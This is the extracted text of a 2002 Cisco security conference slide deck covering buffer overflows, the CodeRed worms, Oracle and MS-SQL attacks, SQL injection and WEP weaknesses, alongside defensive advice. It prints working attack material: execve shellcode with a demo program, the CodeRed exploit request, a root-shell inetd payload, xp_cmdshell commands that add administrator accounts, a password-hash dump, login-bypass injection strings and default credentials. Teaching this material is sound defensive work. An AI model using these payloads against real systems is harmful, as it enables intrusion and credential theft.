• No results found

1923 0 SEC400 pdf

N/A
N/A
Info
Download
Protected

Academic year: 2020

Share "1923 0 SEC400 pdf"

Copied!
111
0
0

Loading.... (view fulltext now)

Download now ( 111 Page )

Full text

(1)SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 1.

(2) SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 2.

(3) Advanced Concepts in Security Threats Session SEC-400. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 3.

(4) What You Can Expect to Learn • Inner workings of buffer overflows Local exploits Remote exploits. • Network worms How they propagate Historical examples Defenses SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 4.

(5) What You Can Expect to Learn. • Database security issues Oracle/MS-SQL SQL Injection. • Wireless security Cracking vulnerable wireless installs Details about passive WEP cracking. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 5.

(6) Goal of the Presentation. Understand the vulnerability, not the exploit. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 6.

(7) Exploits. • Lots of good exploits at: http://www.packetstormsecurity.com/ http://securityfocus.com/ http://lsd-pl.net/ http://www.securiteam.com/exploits/archive.html. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 7.

(8) Buffer Overflows. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 8.

(9) Buffer Overflows • What do buffer overflows have to do with “NETWORK” security? They are a vehicle an attacker can use to gain access to a system. • “I don’t care about buffer overflows, I want to learn network security!”. Insecure Systems = Insecure Networks! SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 9.

(10) What Is a Buffer Overflow • A buffer overflow occurs when an object of size N+M is placed in a container of size N • Usually occurs because of a lack of bounds checking in the program • Execute code of our own choosing. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 10.

(11) Computer Memory Structure. ENVIRON VARS STACK UNUSED VIRTUAL SPACE HEAP BSS DATA TEXT. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 11.

(12) Computer Memory Structure— Procedures. ENVIRON VARS STACK NEW PROCEDURE SPACE UNUSED VIRTUAL SPACE. HEAP BSS DATA TEXT. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 12.

(13) A Simple Program. 1 void function(int a, int b, int c) 2{ 3 char buffer1[5]; 4 char buffer2[10]; 5} 6 7 void main() 8{ 9 function(1,2,3); 10 }. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 13.

(14) Stack Operation Bottom of Stack 22 23 24 25 26 27 28 29 30. pushl movl subl addl pushl pushl pushl call addl. %ebp %esp,%ebp $8,%esp $-4,%esp $3 $2 $1 function $16,%esp. 3 2 1 RET (30). Top of Stack. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 14.

(15) Stack Operation %ebp 8 function: 9 pushl 10 movl 11 subl. %ebp %esp,%ebp $20,%esp %ebp. Bottom of Stack. 3 2 1 RET %ebp Buffer Space Top of Stack. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 15.

(16) Stack Operation Bottom of Stack 3 2 1 RET %ebp buffer1 buffer2 Top of Stack. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 16.

(17) Buffer Overflow—Theory Bottom of Stack FF FB F7. 3 2 1 RET %ebp. F3 EF EB. 0xD8. buffer1 Our Code Our Code. buffer2. D8. Buffer Space Top of Stack SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 17.

(18) What is ‘Our Code’?. • In most cases we want a shell • What if there is no shell code in the program we’re exploiting? Write our own and inject it into the buffer. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 18.

(19) Example Shell Code. #include <stdio.h> int main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 19.

(20) Our Shell Code in Assembler int main() { __asm__(“ jmp 0x26 popl %esi movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx int $0x80 call -0x2b .string \"/bin/sh\" “); } SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. # 2 bytes # 1 byte # 3 bytes # 4 bytes # 7 bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes # 8 bytes. 20.

(21) Shell Code Egg. char shellcode[ ] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3" ;. Notice the nulls. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 21.

(22) Shell Code Egg Cleaned Up char shellcode[ ] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";. • Nulls have been cleaned up • Very compact shellcode • Will work in character buffers SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 22.

(23) A Simple Program shellcode.c 1 char shellcode[ ] = 2 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b“ 3 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 4 "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 5 6 void function(int a, int b, int c) 7 { 8 char buffer1[5]; 9 char buffer2[10]; 10 strcpy(buffer2,shellcode); /* better to use strncpy */ 11 } 12 13 void main() 14 { 15 function(1,2,3); 16 } SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 23.

(24) Local Exploit in Action $ gcc -o shellcode shellcode.c $ ./shellcode shsh-2.04$ exit exit $. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 24.

(25) What about the Real World?. • Very simplistic local example Mechanics are the same for remote exploits. • Real-world remote exploit examples Solaris sadmind exploit for Solaris 2.6 and 7 Microsoft Windows Internet Information Server (IIS) 5.0 Internet Printing Protocol (IPP) exploit SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 25.

(26) Solaris sadmind Exploit. Attacker. Target TCP:1524 Port 111. TCP:32823 TCP:32823 sadmind /bin/sh -i "echo ingreslock stream tcp nowait root /bin/sh sh -i >> /tmp/bob; /usr/sbin/inetd -s /tmp/bob". SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 26.

(27) IIS 5.0 Internet Printing Protocol Exploit. Attacker. Target. TCP:6000. TCP:80. netcat (TCP:6000). GET /NULL.printer HTTP/1.0 Host: [buffer] SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 27.

(28) Defenses • As an administrator: Stay current with patches for your operating systems Minimize available services Non-executable stacks—not a general solution. • What about IDS? Network IDS can detect, but often not stop the attack Host IDS can detect the overflow attempt and prevent. • As a programmer, perform diligent bounds checking and input validation SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 28.

(29) Worms. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 29.

(30) Worms. “A worm is a program that can run by itself and can propagate a fully working version of itself to other machines.” “A Report on the Internet Worm” Robert Page, University of Lowell, Nov. 7, 1988. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 30.

(31) Worms. • Morris Worm • CodeRed • CodeRed v2 • CodeRed II. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 31.

(32) The Morris Worm • One of the first recorded worm infections of the Internet occurred on November 2, 1988 • Later known as the Morris Worm • Attacks through three vectors: sendmail finger rsh/rexec SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 32.

(33) CodeRed. • First appearance was mid-July 2001 • Spreads through Microsoft IIS web servers Targets the IIS .ida vulnerability ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 33.

(34) CodeRed. • First group to do a detailed analysis of this worm was eEye Digital Security This group was also the one which identified and published the .ida vulnerability in June, 2001 Termed the worm “CodeRed”. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 34.

(35) CodeRed Logic Flow No. CodeRed Start. Is Date > 1 || < 19?. Yes Spawn New Thread. No DoS against www.whitehouse.gov. Yes. Is Date > 20 && < 28?. No. Is Date > 28?. Yes Yes. Generate IP List. Yes. No Is Date > 28?. Yes. 100 Threads Present?. Is date > 1 || < 19?. No. Yes. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 100th Worm Thread. Deface Webpage. Dormant. Search for and Infect Other Hosts. Chinese or English?. English. c:\notworm Present?. Chinese. No. 35.

(36) CodeRed Infection • Infection process Selects IP address to attack Connects to the HTTP port and issues a GET request GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090 %u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u 0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 36.

(37) Initial CodeRed Exploit. • The GET request contains the necessary code to exploit the .ida vulnerability • After the .ida exploit code is run execution will jump into the worm code which is held within the body of the initial HTTP request. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 37.

(38) CodeRed Programming Errors • Infection rate was limited due to an error in the generation of IP address Static seed used for the random number generator Each worm instance scanned the same IPs as other worm instances. • www1.whitehouse.gov IP address was used Simple solution—change the IP address of www1.whitehouse.gov. • Worm spread slowly—not so destructive. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 38.

(39) CodeRed v2. • Began to appear on July 19, 2001 • Spreads using the same .ida exploit as CRv1 • Uses a random seed Spread very fast 341,000 machines infected in the first 24 hours. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 39.

(40) CodeRed v2 Infection Progress July 19, Midnight - 159 Hosts Infected. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 40.

(41) CodeRed v2 Infection Progress July 19, 11:40AM - 4,920 Hosts Infected. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 41.

(42) CodeRed v2 Infection Progress July 20, Midnight - 341,015 Hosts Infected. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 42.

(43) CodeRed II. • Began to appear in early August 2001 • Spreads using the same .ida exploit as previous CodeRed worms. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 43.

(44) CodeRed II. • Very similar attack vector to CodeRed GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u00 03%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 44.

(45) CodeRed II Mechanics • On initial access the worm determines if the host has already been infected • If not previously infected the worm initiates it’s propagation method and sets up a backdoor • Goes dormant for one day • Reboots the host • CodeRed II was not memory resident Rebooting a machine did not get rid of the infection SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 45.

(46) CodeRed II vs. CodeRed • CodeRed II did not appear to have a “hack web page” functionality • CodeRed II’s behavior was affected by whether the target system was a Chinese language-based system or not If the target was a Chinese language-based system then the number of threads spawned is 600 (versus 300 for non-Chinese language based systems) System reboot occurs once every two days on Chinese languagebased systems (once per day for others). • CodeRed II also included a backdoor for the attacker c:\inetpub\scripts\root.exe (c:\winnt\system32\cmd.exe) SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 46.

(47) CodeRed Defenses. • Apply Microsoft patch for .ida vulnerability • Host Based IDS (HIDS) • Don’t allow internal hosts to be directly connected to the Internet • Keep virus detection software up to date. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 47.

(48) Database Security. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 48.

(49) Database Hacking Topics. • Objectives • Oracle • MS-SQL • SQL Injection. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 49.

(50) Database Hacking Objectives • Database users and passwords DBA access. • Get sensitive information from db Usernames Passwords Credit card numbers Salary. • Use DB to compromise the host • DoS SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 50.

(51) Finding Database Users • Default Users • Scripts Web applications Maintenance scripts. • Production databases may be secure Development databases may be more lax More DBAs Copy of production data Database names may be similar Disaster recovery database SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 51.

(52) Oracle Vulnerabilities • Listens on tcp/1521 by default • Transport by default has no encryption • Default Accounts SYS[change_on_install] SYSTEM[manager] Over 160 default database accounts 11 default DBA accounts. • Unable to put lockout policy on default DBA accounts • Stop listener (DoS) SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 52.

(53) Oracle vulnerabilities – lsnrctl $ lsnrctl LSNRCTL for Linux: Version 8.1.7.0.0 - Production on 19-MAR-2002 00:24:49 (c) Copyright 1998 Oracle Corporation. All rights reserved. Welcome to LSNRCTL, type "help" for information. LSNRCTL> status Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0))) STATUS of the LISTENER -----------------------Alias LISTENER Version TNSLSNR for Linux: Version 8.1.7.0.0 - Production Start Date 08-MAR-2002 13:18:21 Uptime 10 days 11 hr. 6 min. 30 sec Trace Level off Security ON SNMP OFF Listener Parameter File /home/oracle/8.1.7/network/admin/listener.ora Listener Log File /home/oracle/8.1.7/network/admin/listener.log Services Summary... acctng has 3 service handler(s) cc_accts has 3 service handler(s) The command completed successfully LSNRCTL> stop. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 53.

(54) Oracle Vulnerabilities • Packages provide access to helpful functions for hacking. SEC-400 5197_05_2002_c1. UTL_FILE. Read/write local files on db server. UTL_SMTP. Send e-mail. UTL_TCP. Outgoing TCP connections. UTL_HTTP. Retrieve/Post data via HTTP. © 2002, Cisco Systems, Inc. All rights reserved.. 54.

(55) Oracle Vulnerabilities. • To execute programs on the database server Requires Oracle username/password Requires ‘Create Library’ permission Requires configuration of external procedure calls on the server Requires knowledge of shared object libraries. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 55.

(56) MS-SQL Vulnerabilities • Listens on tcp/1433 and udp/1434 (by default) Can also use named pipes (NetBIOS) for transport. • Transport by default has no encryption • Default DBA - sa[no password] • Unable to put lockout policy on ‘sa’ account • PW is stored in registry key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLSer ver\SQLEW\Registered Server\SQL 6.5 SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 56.

(57) MS-SQL Vulnerabilities • Buffer overflow in MS SQL 2000 Monitor port (1434 udp) 0x04 – Stack Overflow unsafe string copy 0x08 – Heap Overflow 0x08host:port 0x0A – DoS MSSQL !0x0A" " MSSQL SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 57.

(58) MS-SQL Vulnerabilities • Stored procedures provide easy access to common (hacking) tasks. SEC-400 5197_05_2002_c1. sp_databases. Lists the Databases on the Server. sp_tables. Lists the Tables within a Database. sp_columns. Lists Columns in a Table. sp_adduser. Add a User to a Database. sp_help. Lists the Stored Procedures. © 2002, Cisco Systems, Inc. All rights reserved.. 58.

(59) MS-SQL Vulnerabilities. • Executable Procedures Provide methods to interface with underlying OS These commands execute with ‘local system’ privilege. • xp_regread – Retrieves a registry key • xp_cmdshell – Executes a system command xp_ xp_cmdshell ‘net user user password /ADD’ xp_ xp_cmdshell ‘net localgroup /ADD Administrators user’. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 59.

(60) MS-SQL Vulnerabilities linsql> linsql> dir \winnt\ winnt\repair\ repair\sam._ sam._ Executing [xp_cmdshell ' dir \winnt\repair\sam._'] Volume in drive C is NT4W Volume Serial Number is EC10-1C48 Directory of C:\winnt\repair 01/11/02 12:41p 4,141 sam._ 1 File(s) 4,141 bytes 910,810,624 bytes free linsql> linsql> expand \winnt\ winnt\repair\ repair\sam._ sam._ \temp\ temp\sam Executing [xp_cmdshell 'expand \winnt\repair\sam._ \temp\sam'] Microsoft (R) File Expansion Utility Version 2.50 Copyright (C) Microsoft Corp 1990-1994. All rights reserved. Expanding \winnt\repair\sam._ to \temp\sam. \winnt\repair\sam._: 4141 bytes expanded to 16384 bytes, 295% increase. linsql> linsql> \temp\ temp\samdump \temp\ temp\sam Executing [xp_cmdshell '\temp\samdump \temp\sam'] Administrator:500:C09AC013E57A84C2DA1AB7ED930B9D71::Built-in account for administering the computer/domain:: Guest:501:NO PASSWORD*********************::Built-in account for guest access to the computer/domain:: linsql > SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 60.

(61) MS-SQL Vulnerabilities • Common attack tools. SEC-400 5197_05_2002_c1. Sqlpoke.exe. Executes Commands Using xp_cmdshell. linsql. Connect to and Hack MSSQL Databases from Linux. sqldict.exe sqlbf.exe. Brute Force MS-SQL User Passwords. FreeTDS and Perl DBI. Script Attack Scenarios in perl Under Unix. © 2002, Cisco Systems, Inc. All rights reserved.. 61.

(62) SQL Injection. • A method of attacking database driven web servers Insert specially constructed SQL commands as form elements or cookie data On the server, the elements are processed as SQL statements. • Commands are executed on the database server, often behind the firewall/DMZ. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 62.

(63) Example of Expected Behavior. Login Username: auser Password: apassword. select * from users where username=‘auser’ and password=‘apassword’; • If any number of table rows are returned the user is successfully authenticated; otherwise, bad match on username and password. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 63.

(64) Example of Hacked Behavior. Login Username: ’ or username like ‘% Password: ’ or ‘a’=‘a. select * from users where username=‘’or username=‘’or username like ‘% ‘%’ ’ and password=‘’ password=‘’ or ‘a’=‘a’ ‘a’=‘a’ • Since the % wildcards would match on all username and password combinations, the login application would allow access. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 64.

(65) Another Example of Hacked Behavior. Login Account #: 0 or 1=1 Password: ’ or password like ‘%. select * from users where acctnum= acctnum=0 or 1=1 and password=‘’ password=‘’ or password like ‘%’ ‘%’ • When dealing with numeric data, we don’t have to worry about the quoting. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 65.

(66) Other SQL Injection Issues • When multiple rows are returned from a select, the first returned row often gets used • This means we can gain not just access, but often Admin access! Database rows are not returned in any order. • Other SQL commands can be inserted: ; exec xp_cmdshell “net user user pw /ADD” SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 66.

(67) Wireless Security. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 67.

(68) Wireless Topics. • Weaknesses in authentication • Weaknesses in encryption • Weaknesses in management frames • Man in the middle attacks. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 68.

(69) Weaknesses in Authentication. • Service Set Identifier (SSID) • Open Authentication • MAC Address Authentication • Shared Key Authentication. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 69.

(70) The Service Set Identifier (SSID) • Used to logically separate wireless LANs • Often used as a “network password” but is actually broadcast in clear text. SSID Cisco. SSID Wireless. • Removal of SSID from beacons isn’t enough SSID Cisco. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 70.

(71) SSID for Authentication. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 71.

(72) Open Authentication. • No authentication is necessary beyond knowledge of the SSID • If WEP is enabled you must know the WEP key and SSID. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 72.

(73) Wireless MAC Address Authentication •. Client authenticates. •. Client requests association. •. AP check MAC against. •. 1.. local allowed list. 2.. forward to AAA server. Accept association 2. Client MAC Sent as RADIUS Request (PAP). 1. Association Request. Client MAC Address ABC SEC-400 5197_05_2002_c1. 4. Association Response (Success). © 2002, Cisco Systems, Inc. All rights reserved.. AP. RADIUS 3. RADIUS—Accept. 73.

(74) Wireless MAC Address Authentication. • Weaknesses MAC addresses are sent in the clear MAC addresses can be sniffed and spoofed. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 74.

(75) Shared Key Authentication Vulnerabilities Plaintext Challenge. Client. Li st en in g. L. Attacker (Listening). • Vulnerable to known plaintext attack • Weaker than Open with WEP! SEC-400 5197_05_2002_c1. Access Point. Ciphertext Response. © 2002, Cisco Systems, Inc. All rights reserved.. g in n te is. Plaintext Challenge. XOR. Key Stream. Ciphertext Response. 75.

(76) Weaknesses in Encryption. • WEP (Wired Equivalent Privacy) RC4 IVs Inductive Key Derivation IV/WEP Key Replay Frame Bit Flipping SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 76.

(77) 802.11 Wireless Encryption • WEP (Wired Equivalent Privacy) Utilizes RC4 Stream Cipher and CRC32 Static, pre-shared, 40 bit or 104 bit keys on client and access point, with 24 bit IV Very fast stream cipher. Cryptographic Usage Is Flawed SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 77.

(78) What Is a Stream Cipher? Key. Key Stream. Cipher. XOR. Ciphertext. Plaintext. • Generates a key stream of a desired length from the key • The key stream is mixed with the plaintext data • The result is ciphertext data SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 78.

(79) What Is an Initialization Vector? • An initialization vector (IV) is a value that alters the key stream • It augments the key to generate a new key stream • The IV changes keeping the key stream changing. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. IV. Key. Cipher. Key Stream 45678. XOR. Ciphertext WGSSF. Plaintext CISCO. 79.

(80) WEP Data Frame Encrypted. • 802.11 IVs are 24 bit integer values. 0–18432 Bits (Max 18k). 32 Bits. Data. ICV. IV. • Augment 40 bit keys to 64 bits • Augment 104 bit keys to 128 bits. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. Initialization Vector 24 Bits. Pad. Key ID. 6 Bits 2 Bits. 80.

(81) WEP Output. • Encrypted plaintext/ICV is encapsulated in transmission frame • Transmission frame contains the IV in plaintext • Additional MAC layer headers are then added • Frame transmitted. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 81.

(82) WEP Weakness • Occurs when part of the key presented to the KSA is exposed to the attacker When the same secret part of the key is used with numerous different exposed values, an attacker can derive the secret part by analyzing the initial word of the keystreams. • This is exactly how WEP works The secret part of the key is the key input by the user The “numerous different exposed values” is the IV. • We will focus on the second weakness SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 82.

(83) Weak IVs • Which IV values are considered “weak”? • For 128-bit keys the first byte of the IV ranges from 3–16 (0x03–0x10) • For 40-bit keys the first byte of the IV ranges from 3–8 (0x03–0x08). 32 64 96 128 Bits 0 1 2 3 4 5 6 7 8 9 10 11 12 13 Offsets. 1. IV. 1. 32 64 Bits 0 1 2 3 4 5 Offsets. IV. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. Secret Key. Secret Key. 83.

(84) Weak IVs • Second weak IV byte Must be set to FF. • Third weak IV byte Can be any value. • For every weak initial byte of the key there are 256 weak IVs • Examples of weak IVs: 03:FF:A0 SEC-400 5197_05_2002_c1. 10:FF:05. © 2002, Cisco Systems, Inc. All rights reserved.. 0C:FF:0C 84.

(85) The Attack. • For FMS to work the attacker must be able to capture the first word of the RC4 output for each IV • Capture enough packets per IV and the attacker can statistically determine the value of the key byte related to that IV. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 85.

(86) Wireless Security. • Fluhrer, Mantin and Shamir is practical for any key size • The attack was made practical by Adam Stubblefield of Rice University and John Ioannadis and Avi Rubin of AT&T Labs • Also implemented in AirSnort Available at http://airsnort.shmoo.com. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 86.

(87) Fluhrer, Mantin, and Shamir IV. Key. Encrypted Payload. ICV. 00:4A:90 03:FF:FF 04:AB:02 10:FF:01 03:FF:FF 10:FF:01 …. Attacker. Wireless Client. Ethernet. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 87.

(88) AirSnort 0.2. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 88.

(89) Inductive Key Derivation. • An attacker can derive the key by soliciting info from a wireless LAN • Common Methods IV/WEP Key Replay Frame Bit Flipping. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 89.

(90) IV/WEP Key Reuse Vulnerability. • Attacker can send a known plaintext to an observable wireless client (i.e. via email) • Attacker will ‘listen’ to wireless LAN, waiting to see predicted ciphertext • Once attacker ‘sees’ the ciphertext, key stream is derived • Key stream is valid only for the specific IV. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 90.

(91) IV/WEP Key Reuse Vulnerability AP. 2. Attacker Ciphertext Reaches Victim. Corporate Network. Ciphertext. Li. st en in. Li s. Authenticated Client. ten. i ng. Internet. g. Plaintext. 1. Plaintext Data Sent to Victim Attacker. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 91.

(92) Bit Flipping Vulnerability. • Attacker captures a frame from a wireless LAN • The frame is modified by flipping bits • Attacker predicts a high-layer error • Attacker waits for predicted error ciphertext • The key stream is derived upon ‘seeing’ predicted ciphertext. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 92.

(93) Bit Flipping Vulnerability Attacker. Layer 3 Receiver. Access Point. Bit Flipped Frame. ICV Pass. WEP. Ciphertext Error Msg.. Bit Flipped Frame. CRC Fail. Plaintext Error Msg.. WEP. Predicted Plaintext Error Msg XOR. Key Stream. Ciphertext Error Msg. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 93.

(94) Weaknesses in Management Frames. • DoS – Forge management frames Management frames are not encrypted or authenticated Send de-authenticate and disassociate frames AP re-association is not possible if disassociate messages are sent continuously. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 94.

(95) Wireless Man in the Middle. • 802.11 layer insertion • Attacker is inline for all key exchanges. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 95.

(96) Wireless Man in the Middle Ch=6 AP Corporate Network Ciphertext. Authenticated Client. SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 96.

(97) Wireless Man in the Middle Ch=6 AP Corporate Network Ciphertext. Disassociate (AP) Authenticated Client. Attacker. • Attacker sends disassociate messages to the user spoofing the AP’s MAC address SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 97.

(98) Wireless Man in the Middle Ch=6 AP Associate. Corporate Network. Disassociate (AP) Client. Attacker. • User gets too many disassociate messages and looks for another AP • Increments channel SEC-400 5197_05_2002_c1. © 2002, Cisco Systems, Inc. All rights reserved.. 98.

